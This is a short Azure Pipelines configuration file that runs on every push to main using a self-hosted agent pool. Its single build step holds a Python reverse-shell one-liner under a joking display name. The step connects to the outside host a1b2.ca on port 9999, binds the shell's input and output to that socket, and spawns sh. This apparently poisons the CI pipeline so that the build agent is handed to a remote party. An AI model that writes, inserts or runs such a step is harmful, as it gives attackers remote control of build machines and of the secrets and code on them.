# azure-pipelines.yml
trigger:
- main

pool:
  name: WKL-rwbuvlczft6004564  # This must match the name of your self-hosted agent pool

steps:
- script: import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('a1b2.ca',9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh')
  displayName: 'CURL IRON v2 electric boogaloo'
